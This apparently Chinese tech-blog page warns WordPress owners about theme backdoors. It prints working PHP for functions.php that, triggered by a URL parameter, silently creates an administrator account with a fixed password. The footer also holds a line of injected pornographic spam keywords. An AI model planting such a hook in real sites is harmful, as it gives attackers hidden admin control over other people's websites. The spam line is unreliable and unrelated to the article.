防范wordpress主題加后門代碼獲取管理員權限

來源：本站原創(chuàng)|時間：2020-01-11|欄目：WordPress|點擊：次

復制代碼

代碼如下:

add_action( 'wp_head', 'my_backdoor' );
function my_backdoor() {
if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) {
require( 'wp-includes/registration.php' );
if ( !username_exists( 'backdoor' ) ) {
$user_id = wp_create_user( 'backdoor', 'pa55w0rd!' );
$user = new WP_User( $user_id );
$user->set_role( 'administrator' );
}
}
}

簡單說明下，代碼主要放于functions.php文件里面，不會影響任何功能使用，如果存在此代碼，任何人只要運行http://www.你的域名.com/?backdoor=go，然后就創(chuàng)建了一個用戶名為“backdoor”，密碼為：“pa55w0rd!” 的管理員。同樣具備管理員的權限，很編輯主題代碼文件，相信此時你一定感覺到很危險了吧，趕緊檢查檢查自己的主題代碼吧……

上一篇：wordpress無法登錄后臺的解決方案

欄目：WordPress

下一篇：wordpress全局變量$wpdb初始化并聲明為全局變量的方法

本文標題：防范wordpress主題加后門代碼獲取管理員權限

本文地址：http://mengdiqiu.com.cn/a1/WordPress/12808.html

更多WordPress

欧美大屁股bbbbxxxx,狼人大香伊蕉国产www亚洲,男ji大巴进入女人的视频小说,男人把ji大巴放进女人免费视频,免费情侣作爱视频

WordPress

防范wordpress主題加后門代碼獲取管理員權限

您可能感興趣的文章

閱讀排行

本欄相關

隨機閱讀